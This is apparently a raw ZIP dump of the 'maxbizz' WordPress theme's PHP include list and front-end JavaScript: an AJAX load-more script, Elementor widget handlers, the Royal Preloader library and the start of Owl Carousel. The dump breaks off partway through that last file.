		wp_enqueue_script( 'comment-reply' );
	}
}
add_action( 'wp_enqueue_scripts', 'maxbizz_scripts' );



/**
 * Custom template tags for this theme.
 */
require get_template_directory() . '/inc/frontend/template-tags.php';

/**
 * Functions which enhance the theme by hooking into WordPress.
 */
require get_template_directory() . '/inc/frontend/template-functions.php';

/**
 * Custom Page Header for this theme.
 */
require get_template_directory() . '/inc/frontend/page-header/breadcrumbs.php';
require get_template_directory() . '/inc/frontend/page-header/page-header.php';

/**
 * Functions which add more to backend.
 */
require get_template_directory() . '/inc/backend/admin-functions.php';

/**
 * Custom metabox for this theme.
 */
require get_template_directory() . '/inc/backend/meta-boxes.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/backend/customizer/customizer.php';

/**
 * Register the required plugins for this theme.
 */
require get_template_directory() . '/inc/backend/plugin-requires.php';
require get_template_directory() . '/inc/backend/importer.php';

/**
 * Customizer additions.
 */
require get_template_directory() . '/inc/backend/color.php';

/**
 * Preloader js & css
 */
require get_template_directory() . '/inc/frontend/preloader.php';

/**
 * Elementor functions.
 */

require get_template_directory() . '/inc/backend/elementor/elementor.php';
require get_template_directory() . '/inc/frontend/builder.php';

/**
 * Load WooCommerce compatibility file.
 */
if ( class_exists( 'woocommerce' ) ) {
	require get_template_directory() . '/inc/woocommerce/woocommerce.php';
}
PK�8FZ����	�	js/myloadmore.jsnu�[���(function($) {
	"use strict";

	function updateFilter() {
        $('.project_filters a').each(function() {
            var data_filter = this.getAttribute('data-filter');
            var num = $(this)
                .closest('.project-filter-wrapper')
                .find('.project-item')
                .filter(data_filter).length;
            $(this)
                .find('.filter-count')
                .text( num );
            if ( num != 0 && $(this).hasClass('empty') ) {
                $(this).removeClass('empty');
            }
        });
    }

	function loadmore(){
		
		var btn		= $(this),
			grid    = $(this).parents('.project-filter-wrapper').find('.projects-grid'),
			offset  = grid.find('.project-item').length,
			more    = grid.data('load'),
			loaded  = $(this).data('loaded'),
			loading = $(this).data('loading'),
			cat 	= $(this).data('category'),
			style 	= $(this).data('style'),
			count   = grid.data('count');

		$.ajax({
			url : maxbizz_loadmore_params.ajaxurl, // AJAX handler
			data : {
				'action': 'loadmore', // the parameter for admin-ajax.php
				'ppp'	: more,
				'cat'	: cat,
				'offset': offset,
				'style'	: style,
			},
			type : 'POST',
			beforeSend : function ( xhr ) { 
				btn.text(loading).append('<i class="ot-flaticon-refresh fas fa-spin"></i>'); // some type of preloader
			},
			success : function( data ){
				if( data ) {
					var items = $(data);
					btn.text(loaded);
					grid.append(items).isotope('appended', items); // insert new posts
					updateFilter();
					if( grid.hasClass('img-popup') ){
						grid.data("lightGallery").destroy(true);
						grid.lightGallery({
							selector: '.projects-thumbnail',
							share: false,
							pager: false,
							thumbnail: false
						});
					}

				} else {
					btn.hide(); // if no data, HIDE the button as well
				}
			}
		});
		offset += more;
		if( count <= offset ){
			btn.fadeOut(1000);
		}
		return false;
	}

	var projectLoadmore = function ($scope, $) {
		$scope.find('.project-filter-wrapper').each(function () {
			var selector = $(this).find('.btn-loadmore');
			selector.on('click', loadmore);
		});
	};

	/**
     * Elementor JS Hooks
     */
    $(window).on("elementor/frontend/init", function () {

		/*projects filter isotope*/
		elementorFrontend.hooks.addAction(
            "frontend/element_ready/ipfilter.default",
            projectLoadmore
        );

  });

})(jQuery);PK�8FZH
���*�*js/elementor.min.jsnu�[���!function(s){"use strict";function m(){return!!s("body").hasClass("rtl")}function t(t,n){t.find(".ot-accordions").each(function(){var t=n(this),e=t.find(".acc-content"),o=t.find(".acc-toggle");o.off("click"),o.each(function(){"yes"==n(this).data("default")&&(n(this).next().addClass("active").slideDown(300),n(this).parent().addClass("current"))}),o.on("click",function(t){t.preventDefault();var a=n(this);a.next().toggleClass("active").slideToggle(300),a.parent().toggleClass("current"),e.not(a.next()).slideUp(300),o.not(a).parent().removeClass("current")})})}function a(t,o){t.find(".ot-tabs").each(function(){var t=o(this),a=t.find(".tabs-heading li"),e=t.find(".tab-content");a.first().addClass("current"),e.first().addClass("current"),a.on("click",function(){var t=o(this).attr("data-tab");o(this).siblings().removeClass("current"),o(this).parents(".ot-tabs").find(".tab-content").removeClass("current"),o(this).addClass("current"),o("#"+t).addClass("current")})})}function e(){s(".icounter[data-counter]").each(function(){var t=s(document).scrollTop()+s(window).height(),a=s(this).find("span.num"),e=a.attr("data-to"),o=parseInt(a.attr("data-time"));t>a.offset().top+a.height()&&(s(this).removeAttr("data-counter"),s({countNum:a.text()}).animate({countNum:e},{duration:o,easing:"swing",step:function(){a.text(Math.floor(this.countNum))},complete:function(){a.text(this.countNum)}}))})}function o(t,u){t.find(".ot-countdown").each(function(){var t=u(this),a=t.data("date"),e=t.data("zone"),o=t.data("day"),n=t.data("days"),s=t.data("hour"),i=t.data("hours"),r=t.data("min"),d=t.data("mins"),l=t.data("second"),c=t.data("seconds");t.countdown({date:a,offset:e,day:o,days:n,hour:s,hours:i,minute:r,minutes:d,second:l,seconds:c},function(){alert("Done!")})})}function n(t,f){t.find(".logos-carousel").each(function(){var t=f(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("dots"),s=t.data("arrows"),i=t.data("show")?t.data("show"):2,r=t.data("tshow")?t.data("tshow"):2,d=t.data("mshow")?t.data("mshow"):2,l=""!==t.data("gaps")?t.data("gaps"):70,c=""!==t.data("tgaps")?t.data("tgaps"):50,u=""!==t.data("mgaps")?t.data("mgaps"):30;t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,loop:a,responsiveClass:!0,dots:n,nav:s,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>'],responsive:{0:{margin:u,items:d},768:{margin:c,items:r},1024:{margin:l,items:i}}})})}function i(t,l){t.find(".ot-testimonials-carousel").each(function(){var t=l(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("dots"),s=t.data("arrows"),i=t.data("show")?t.data("show"):3,r=t.data("tshow")?t.data("tshow"):2,d=t.data("mshow")?t.data("mshow"):1;t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,loop:a,responsiveClass:!0,margin:30,dots:n,nav:s,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>'],responsive:{0:{items:d},768:{items:r},1024:{items:i}}})})}function r(t,i){t.find(".ot-testimonials-carousel-2").each(function(){var t=i(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("dots"),s=t.data("arrows");t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,loop:a,responsiveClass:!0,animateOut:"fadeOut",animateIn:"fadeIn",margin:30,items:1,dots:n,nav:s,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>']})})}function d(){s(".line-progress:not([data-processed])").each(function(){var t=s(this),a=t.find(".progress-bar"),e=t.data("percent"),o=t.find(".percent");if(s(document).scrollTop()+s(window).height()>t.offset().top+t.height()){t.attr("data-processed","true"),a.css("width",t.outerWidth()*(e/100)+"px");for(var n=0;n<=50;n++)!function(t){setTimeout(function(){o.html(Math.round(e/50*t)+"%")},30*t)}(n)}})}function l(){s(".circle-progress:not([data-processed])").each(function(){var t=s(this),a=t.data("color"),e=t.data("height"),o=t.data("size");s(document).scrollTop()+s(window).height()>t.offset().top+t.height()&&(t.attr("data-processed","true"),t.find(".inner-bar").easyPieChart({barColor:a,trackColor:!1,scaleColor:!1,lineCap:"square",lineWidth:e,size:o,animate:1e3,onStart:s.noop,onStop:s.noop,easing:"easeOutBounce",onStep:function(t,a,e){s(this.el).find(".percent").text(Math.round(e)+"%")}}))})}function c(){d(),l()}function u(){s(".projects-grid").each(function(){var e=s(this);e.imagesLoaded(function(){e.isotope({itemSelector:".project-item",animationEngine:"css",masonry:{columnWidth:".grid-sizer"},isOriginLeft:!s("body").hasClass("rtl")})}),s(this).closest(".project-filter-wrapper").find(".project_filters").find("a").on("click",function(){var t=s(this);if(t.hasClass("selected"))return!1;t.parents(".project_filters").find(".selected").removeClass("selected"),t.addClass("selected");var a=s(this).attr("data-filter");return e.isotope({filter:a}),!1}),e.hasClass("img-popup")&&s(".img-popup").lightGallery({selector:".projects-thumbnail",share:!1,pager:!1,thumbnail:!1}),s(".project_filters a").each(function(){var t=this.getAttribute("data-filter"),a=s(this).closest(".project-filter-wrapper").find(".project-item").filter(t).length;s(this).find(".filter-count").text(a)})})}function f(t,h){t.find(".project-slider").each(function(){var t=h(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("center"),s=t.data("dots"),i=t.data("arrows"),r=t.data("show")?t.data("show"):2,d=t.data("tshow")?t.data("tshow"):2,l=t.data("mshow")?t.data("mshow"):2,c=""!==t.data("gaps")?t.data("gaps"):60,u=""!==t.data("tgaps")?t.data("tgaps"):40,f=""!==t.data("mgaps")?t.data("mgaps"):20;t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,center:n,loop:a,responsiveClass:!0,dots:s,nav:i,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>'],responsive:{0:{margin:f,items:l},768:{margin:u,items:d},1024:{margin:c,items:r}}})})}function h(t,f){t.find(".post-slider").each(function(){var t=f(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("dots"),s=t.data("arrows"),i=t.data("show")?t.data("show"):3,r=t.data("tshow")?t.data("tshow"):2,d=t.data("mshow")?t.data("mshow"):1,l=""!==t.data("gaps")?t.data("gaps"):30,c=""!==t.data("tgaps")?t.data("tgaps"):30,u=""!==t.data("mgaps")?t.data("mgaps"):30;t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,loop:a,responsiveClass:!0,dots:n,nav:s,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>'],responsive:{0:{margin:u,items:d},768:{margin:c,items:r},1024:{margin:l,items:i}}})})}function p(t,f){t.find(".ot-team-carousel").each(function(){var t=f(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("dots"),s=t.data("arrows"),i=t.data("show")?t.data("show"):3,r=t.data("tshow")?t.data("tshow"):2,d=t.data("mshow")?t.data("mshow"):1,l=""!==t.data("gaps")?t.data("gaps"):30,c=""!==t.data("tgaps")?t.data("tgaps"):30,u=""!==t.data("mgaps")?t.data("mgaps"):30;t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,loop:a,responsiveClass:!0,dots:n,nav:s,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>'],responsive:{0:{margin:u,items:d},768:{margin:c,items:r},1024:{margin:l,items:i}}})})}function g(t,f){t.find(".image-box-carousel").each(function(){var t=f(this),a=t.data("loop"),e=t.data("auto"),o=t.data("time"),n=t.data("dots"),s=t.data("arrows"),i=t.data("show")?t.data("show"):3,r=t.data("tshow")?t.data("tshow"):2,d=t.data("mshow")?t.data("mshow"):1,l=""!==t.data("gaps")?t.data("gaps"):30,c=""!==t.data("tgaps")?t.data("tgaps"):30,u=""!==t.data("mgaps")?t.data("mgaps"):30;t.find(".owl-carousel").owlCarousel({rtl:m(),autoplay:e,autoplayTimeout:o,loop:a,responsiveClass:!0,dots:n,nav:s,navText:['<i class="ot-flaticon-left-arrow-2"></i>','<i class="ot-flaticon-trajectory"></i>'],responsive:{0:{margin:u,items:d},768:{margin:c,items:r},1024:{margin:l,items:i}}})})}function w(t,a){t.find(".team-social > span").on("click",function(){a(this).parent().toggleClass("active")})}function v(t,a){t.find(".ot-video-button").each(function(){a(this).lightGallery({selector:".btn-play"})})}function y(t,a){t.find(".ot-message-box").each(function(){a(this).find(">i").on("click",function(){t.fadeOut()})})}function C(t,o){t.find(".features-service-wrapper").each(function(){var t=o(this),a=t.find(".features-service-item"),e=t.find(".features-service-img");a.each(function(){"yes"==o(this).data("default")&&(e.removeClass("hover"),o(this).next().addClass("hover"))}),a.hover(function(){e.removeClass("hover"),o(this).next().addClass("hover")})})}function x(){var t=s(".features-service-wrapper");t.length&&t.each(function(){s(this).find(".features-service-item").each(function(){var t,a=s(this).find(".features-service-desc"),e=s(this).find(".features-service-title");1024<s(window).width()?(t=a.outerHeight(!0),e.css({transform:"translateY("+t+"px)"}),s(this).mouseenter(function(){e.css({transform:"translateY(0px)"})}).mouseleave(function(){e.css({transform:"translateY("+t+"px)"})})):(e.css("transform",""),s(this).unbind("mouseenter mouseleave"))})})}s(window).on("scroll",function(){d(),l(),e()}),s(window).on("load",function(){d(),l(),e(),x()}),s(window).on("resize",function(){s(".line-progress[data-processed]").each(function(){var t=s(this),a=t.find(".progress-bar"),e=parseInt(t.data("percent"));a.css("width",t.outerWidth()*(e/100)+"px")}),x()}),s(window).on("elementor/frontend/init",function(){elementorFrontend.hooks.addAction("frontend/element_ready/iaccordions.default",t),elementorFrontend.hooks.addAction("frontend/element_ready/itabs.default",a),elementorFrontend.hooks.addAction("frontend/element_ready/icounter.default",e),elementorFrontend.hooks.addAction("frontend/element_ready/icounter2.default",e),elementorFrontend.hooks.addAction("frontend/element_ready/iclogos.default",n),elementorFrontend.hooks.addAction("frontend/element_ready/itestimonials.default",i),elementorFrontend.hooks.addAction("frontend/element_ready/itestimonials2.default",r),elementorFrontend.hooks.addAction("frontend/element_ready/iiboxcarousel.default",g),elementorFrontend.hooks.addAction("frontend/element_ready/iprogress.default",c),elementorFrontend.hooks.addAction("frontend/element_ready/ipfilter.default",u),elementorFrontend.hooks.addAction("frontend/element_ready/ipcarousel.default",f),elementorFrontend.hooks.addAction("frontend/element_ready/ipostcarousel.default",h),elementorFrontend.hooks.addAction("frontend/element_ready/iteamcarousel.default",p),elementorFrontend.hooks.addAction("frontend/element_ready/imember.default",w),elementorFrontend.hooks.addAction("frontend/element_ready/icountdown.default",o),elementorFrontend.hooks.addAction("frontend/element_ready/ivideopopup.default",v),elementorFrontend.hooks.addAction("frontend/element_ready/imessagebox.default",y),elementorFrontend.hooks.addAction("frontend/element_ready/ifearuresservice.default",C)})}(jQuery);PK�8FZ� ��js/elementor-header.min.jsnu�[���!function(t){"use strict";var n=t("#panel-btn"),a=t("#side-panel");t("#panel-btn, .side-panel-close, .panel-overlay").on("click",function(){var e=!n.hasClass("active");return n.toggleClass("active",e),a.toggleClass("side-panel-open",e),t("body").toggleClass("side-panel-active",e),!1});function e(e,n){e.find(".octf-search").each(function(){var e=n(this);e.find(".toggle_search").on("click",function(){n(this).toggleClass("active"),e.find(".h-search-form-field").toggleClass("show"),n(this).find("i").hasClass("ot-flaticon-search-1")?n(this).find("i").removeClass("ot-flaticon-search-1").addClass("ot-flaticon-cancel"):n(this).find("i").removeClass("ot-flaticon-cancel").addClass("ot-flaticon-search-1")})})}function o(){var n=t("#mmenu-toggle"),a=t("#mmenu-wrapper");t("#mmenu-toggle, .mmenu-close, .mmenu-overlay").on("click",function(){var e=!n.hasClass("active");return n.toggleClass("active",e),a.toggleClass("mmenu-open",e),t("body").toggleClass("mmenu-active",e),!1}),t(".mmenu-wrapper li:has(ul)").prepend('<span class="arrow"><i class="ot-flaticon-next"></i></span>'),t(".mmenu-wrapper .mobile_mainmenu > li span.arrow").on("click",function(){t(this).parent().find("> ul").stop(!0,!0).slideToggle(),t(this).toggleClass("active")})}t(window).on("elementor/frontend/init",function(){elementorFrontend.hooks.addAction("frontend/element_ready/isearch.default",e),elementorFrontend.hooks.addAction("frontend/element_ready/imenu_mobile.default",o)})}(jQuery);PK�8FZ�
�Ljs/myloadmore.min.jsnu�[���!function(d){"use strict";function a(){var a=d(this),i=d(this).parents(".project-filter-wrapper").find(".projects-grid"),t=i.find(".project-item").length,e=i.data("load"),r=d(this).data("loaded"),n=d(this).data("loading"),o=d(this).data("category"),s=d(this).data("style"),l=i.data("count");return d.ajax({url:maxbizz_loadmore_params.ajaxurl,data:{action:"loadmore",ppp:e,cat:o,offset:t,style:s},type:"POST",beforeSend:function(t){a.text(n).append('<i class="ot-flaticon-refresh fas fa-spin"></i>')},success:function(t){var e;t?(e=d(t),a.text(r),i.append(e).isotope("appended",e),d(".project_filters a").each(function(){var t=this.getAttribute("data-filter"),e=d(this).closest(".project-filter-wrapper").find(".project-item").filter(t).length;d(this).find(".filter-count").text(e),0!=e&&d(this).hasClass("empty")&&d(this).removeClass("empty")}),i.hasClass("img-popup")&&(i.data("lightGallery").destroy(!0),i.lightGallery({selector:".projects-thumbnail",share:!1,pager:!1,thumbnail:!1}))):a.hide()}}),l<=(t+=e)&&a.fadeOut(1e3),!1}function t(t,e){t.find(".project-filter-wrapper").each(function(){e(this).find(".btn-loadmore").on("click",a)})}d(window).on("elementor/frontend/init",function(){elementorFrontend.hooks.addAction("frontend/element_ready/ipfilter.default",t)})}(jQuery);PK�8FZ�@N=��js/elementor-header.jsnu�[���(function($) {
    "use strict";
  
    /* --------------------------------------------------
    * side panel
    * --------------------------------------------------*/
      var element = $('#panel-btn'),
      sidebar = $('#side-panel');
  
      function panel_handler() {
          var isActive = !element.hasClass('active');
  
          element.toggleClass('active', isActive);
          sidebar.toggleClass('side-panel-open', isActive);
          $('body').toggleClass('side-panel-active', isActive);
          return false;
      }
  
      $('#panel-btn, .side-panel-close, .panel-overlay').on('click', panel_handler);
  
    /* --------------------------------------------------
    * toggle search
    * --------------------------------------------------*/
    var tgSearch  = function($scope, $){
      $scope.find('.octf-search').each( function(){
        var selector = $(this);
        selector.find('.toggle_search').on("click", function(){
          $(this).toggleClass( "active" );
          selector.find('.h-search-form-field').toggleClass('show');
          if ($(this).find('i').hasClass( "ot-flaticon-search-1" )) {
            $(this).find('i').removeClass( "ot-flaticon-search-1" ).addClass("ot-flaticon-cancel");
          }else{
            $(this).find('i').removeClass( "ot-flaticon-cancel" ).addClass("ot-flaticon-search-1");
          }
        });
      });
    };
  
    /* --------------------------------------------------
    * mobile menu
    * --------------------------------------------------*/
    var mmenuPanel  = function(){
          var element = $('#mmenu-toggle'),
              mmenu   = $('#mmenu-wrapper');
  
          function mmenu_handler() {
              var isActive = !element.hasClass('active');
  
              element.toggleClass('active', isActive);
              mmenu.toggleClass('mmenu-open', isActive);
              $('body').toggleClass('mmenu-active', isActive);
              return false;
          }
  
          $('#mmenu-toggle, .mmenu-close, .mmenu-overlay').on('click', mmenu_handler);
  
          $('.mmenu-wrapper li:has(ul)').prepend('<span class="arrow"><i class="ot-flaticon-next"></i></span>');
          $(".mmenu-wrapper .mobile_mainmenu > li span.arrow").on('click',function() {
              $(this).parent().find("> ul").stop(true, true).slideToggle()
              $(this).toggleClass( "active" ); 
          });
      };
  
      /**
       * Elementor JS Hooks
       */
      $(window).on("elementor/frontend/init", function () {
  
          /*toggle search*/
          elementorFrontend.hooks.addAction(
              "frontend/element_ready/isearch.default",
              tgSearch
          );
  
          /*mmenu*/
          elementorFrontend.hooks.addAction(
              "frontend/element_ready/imenu_mobile.default",
              mmenuPanel
          );
  
    });
  
  })(jQuery);PK�8FZ+��?$?$js/royal_preloader.min.jsnu�[���/*
|------------------------------------------|
| MelonHTML5 - Royal Preloader             |
|------------------------------------------|
| @author:  Lee Le (lee@melonhtml5.com)    |
| @version: 2.06 (11 April 2015)           |
| @website: www.melonhtml5.com             |
|------------------------------------------|
*/

/**
  (https://developer.mozilla.org/en-US/docs/DOM/document.cookie)
  docCookies.setItem(name, value[, end[, path[, domain[, secure]]]])
  docCookies.getItem(name)
  docCookies.removeItem(name[, path])
  docCookies.hasItem(name)
*/
var docCookies={getItem:function(a){return!a||!this.hasItem(a)?null:unescape(document.cookie.replace(RegExp("(?:^|.*;\\s*)"+escape(a).replace(/[\-\.\+\*]/g,"\\$&")+"\\s*\\=\\s*((?:[^;](?!;))*[^;]?).*"),"$1"))},setItem:function(a,c,b,e,f,g){if(a&&!/^(?:expires|max\-age|path|domain|secure)$/i.test(a)){var d="";if(b)switch(b.constructor){case Number:d=Infinity===b?"; expires=Tue, 19 Jan 2038 03:14:07 GMT":"; max-age="+b;break;case String:d="; expires="+b;break;case Date:d="; expires="+b.toGMTString()}document.cookie=
escape(a)+"="+escape(c)+d+(f?"; domain="+f:"")+(e?"; path="+e:"")+(g?"; secure":"")}},removeItem:function(a,c){a&&this.hasItem(a)&&(document.cookie=escape(a)+"=; expires=Thu, 01 Jan 1970 00:00:00 GMT"+(c?"; path="+c:""))},hasItem:function(a){return RegExp("(?:^|;\\s*)"+escape(a).replace(/[\-\.\+\*]/g,"\\$&")+"\\s*\\=").test(document.cookie)}};

var JQ=jQuery;window.requestAnimFrame=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(a){window.setTimeout(a,1E3/60)}}();
window.transitionEnd=function(a,c){var b=!1,d=document.createElement("div");JQ(["transition","WebkitTransition","MozTransition","msTransition"]).each(function(a,c){if(void 0!==d.style[c])return b=!0,!1});b?a.bind("webkitTransitionEnd oTransitionEnd MSTransitionEnd transitionend",function(b){a.unbind("webkitTransitionEnd oTransitionEnd MSTransitionEnd transitionend");c(b,a)}):setTimeout(function(){c(null,a)},0);return a};
var Royal_Preloader={_overlay:null,_loader:null,_name:null,_percentage:null,_on_complete:null,_text_loader:null,_text_loader_overlay:null,_logo_loader:null,_logo_loader_meter:null,_total:0,_loaded:0,_image_queue:[],_percentage_loaded:0,_mode:"number",_text:"loading...",_text_colour:"#FFFFFF",_images:[],_show_progress:!0,_show_percentage:!0,_background:"#000000",_logo:"",_logo_size:[80,80],_cookie:!1,_timeout:10,_init:function(){JQ("img").each(function(a){JQ(this).attr("src")&&Royal_Preloader._images.push(JQ(this).attr("src"))});
if(Royal_Preloader._cookie){if(docCookies.getItem("melonhtml5_royal_preloader_"+Royal_Preloader._cookie)){JQ("#royal_preloader").remove();JQ(document.body).removeClass("royal_preloader");return}docCookies.setItem("melonhtml5_royal_preloader_"+Royal_Preloader._cookie,(new Date).getTime(),Infinity)}Royal_Preloader._total=Royal_Preloader._images.length;Royal_Preloader._build();Royal_Preloader._load()},_build:function(){this._overlay=JQ("#royal_preloader");this._overlay.length||(this._overlay=JQ("<div>").attr("id",
"royal_preloader").prependTo(JQ(document.body)));this._overlay.addClass("royal_preloader_"+this._mode);"line"!==this._mode&&this._overlay.css("background-color",this._background);switch(this._mode){case "number":var a=this._hexToRgb(this._text_colour);this._percentage=JQ("<div>").html("<div></div><span></span>").css({color:this._text_colour,"border-color":a?"rgba("+a.r+", "+a.g+", "+a.b+", 0.7)":this._text_colour}).addClass("royal_preloader_percentage").appendTo(this._overlay);this._percentage.children("div").css("border-left-color",
this._text_colour);break;case "text":this._text_loader=JQ("<div>").addClass("royal_preloader_loader").text(this._text).css("color",this._text_colour).appendTo(this._overlay);this._text_loader_overlay=JQ("<div>").css("background-color",this._background).appendTo(this._text_loader);break;case "scale_text":for(var a="",c=0;c<this._text.length;c++)a+="<span>"+this._htmlentities(this._text.charAt(c))+"</span>";this._text_loader=JQ("<div>").addClass("royal_preloader_loader").html(a).css("color",this._text_colour).appendTo(this._overlay);
break;case "logo":this._logo_loader=JQ("<div>").css({width:this._logo_size[0],height:this._logo_size[1],"margin-left":this._logo_size[0]/2*-1,"margin-top":this._logo_size[1]/2*-1,"background-image":'url("'+this._logo+'")'}).addClass("royal_preloader_loader").appendTo(this._overlay);this._logo_loader_meter=JQ("<div>").css("background-color",this._background).appendTo(this._logo_loader);this._show_progress&&(this._percentage=JQ("<div>").css({color:this._text_colour,width:this._logo_size[0],height:this._logo_size[1],
"margin-left":this._logo_size[0]/2*-1,"margin-top":this._logo_size[1]/2,"background-color":this._background}).addClass("royal_preloader_percentage").appendTo(this._overlay));break;case "line":this._line_loader=JQ("<div>").addClass("royal_preloader_loader").css("background-color",this._background).appendTo(this._overlay);JQ("<div>").addClass("royal_preloader_peg").css("box-shadow","0 0 10px "+this._background).appendTo(this._line_loader);JQ(document.body).css("visibility","visible");break;case "progress":this._progress_loader=
JQ("<div>").addClass("royal_preloader_loader").appendTo(this._overlay),this._progress_loader_meter=JQ("<div>").addClass("royal_preloader_meter").appendTo(this._progress_loader),this._show_progress&&(this._percentage=JQ("<div>").addClass("royal_preloader_percentage").text(0).appendTo(this._overlay))}this._overlay.appendTo(JQ(document.body));"text"!==this._mode&&"scale_text"!==this._mode||this._text_loader.css("margin-left",this._text_loader.width()/2*-1)},_load:function(){if(("number"===this._mode||
"logo"===this._mode||"progress"===this._mode)&&this._show_progress){this._percentage.data("num",0);var a="0"+(Royal_Preloader._show_percentage?"%":"");"number"===this._mode?this._percentage.children("span").text(a):this._percentage.text(a)}JQ.each(this._images,function(a,b){var d=function(){Royal_Preloader._imageOnLoad(b)},e=new Image;e.src=b;e.complete?d():(e.onload=d,e.onerror=d)});setTimeout(function(){Royal_Preloader._overlay&&Royal_Preloader._animatePercentage(Royal_Preloader._percentage_loaded,
100)},this._images.length?1E3*this._timeout:0)},_hexToRgb:function(a){return(a=/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(a))?{r:parseInt(a[1],16),g:parseInt(a[2],16),b:parseInt(a[3],16)}:null},_htmlentities:function(a){return a.toString().replace(/&/g,"&amp;").replace(/\"/g,"&quot;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/ /g,"&nbsp;")},_animatePercentage:function(a,c){Royal_Preloader._percentage_loaded=a;a<c&&(a++,setTimeout(function(){switch(Royal_Preloader._mode){case "text":Royal_Preloader._text_loader_overlay.css("left",
a+"%");break;case "scale_text":var b=parseInt(Royal_Preloader._text.length*a*.01,10);Royal_Preloader._text_loader.children("span").eq(b).addClass("loaded");break;case "line":Royal_Preloader._line_loader.width(a+"%");break;case "number":Royal_Preloader._show_progress&&(b=a+(Royal_Preloader._show_percentage?"%":""),Royal_Preloader._percentage.children("span").text(b));break;case "logo":Royal_Preloader._show_progress&&(b=a+(Royal_Preloader._show_percentage?"%":""),Royal_Preloader._percentage.text(b));
Royal_Preloader._logo_loader_meter.css("bottom",a+"%");break;case "progress":Royal_Preloader._show_progress&&(b=a+(Royal_Preloader._show_percentage?"%":""),Royal_Preloader._percentage.text(b)),Royal_Preloader._progress_loader_meter.width(a+"%")}Royal_Preloader._animatePercentage(a,c)},5),100===a&&Royal_Preloader._loadFinish())},_imageOnLoad:function(a){this._image_queue.push(a);this._image_queue.length&&this._image_queue[0]===a&&this._processQueue()},_reQueue:function(){Royal_Preloader._image_queue.splice(0,
1);Royal_Preloader._processQueue()},_processQueue:function(){0!==this._image_queue.length&&(this._loaded++,Royal_Preloader._animatePercentage(Royal_Preloader._percentage_loaded,parseInt(this._loaded/this._total*100,10)),this._reQueue())},_loadFinish:function(){transitionEnd(this._overlay,function(a,c){Royal_Preloader._overlay&&(Royal_Preloader._overlay.remove(),Royal_Preloader._overlay=null)});this._overlay.addClass("complete");JQ(document.body).removeClass("royal_preloader");this._on_complete&&this._on_complete()},
config:function(a){"undefined"!==typeof a.mode&&(this._mode=a.mode);"undefined"!==typeof a.text&&(this._text=a.text);"undefined"!==typeof a.text_colour&&(this._text_colour=a.text_colour);"undefined"!==typeof a.timeout&&(this._timeout=parseInt(a.timeout,10));"undefined"!==typeof a.showProgress&&(this._show_progress=a.showProgress?!0:!1);"undefined"!==typeof a.showPercentage&&(this._show_percentage=a.showPercentage?!0:!1);"undefined"!==typeof a.background&&(this._background=a.background);"undefined"!==
typeof a.logo&&(this._logo=a.logo);"undefined"!==typeof a.logo_size&&(this._logo_size=a.logo_size);"undefined"!==typeof a.onComplete&&(this._on_complete=a.onComplete);"undefined"!==typeof a.images&&(this._images=a.images);"undefined"!==typeof a.cookie&&(this._cookie=a.cookie)}};setTimeout(function(){JQ(document).ready(Royal_Preloader._init)});PK�8FZTś�<�<�js/owl.carousel.min.jsnu�[���/**
 * Owl Carousel v2.3.4
 * Copyright 2013-2018 David Deutsch
 * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE
 */
!function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new 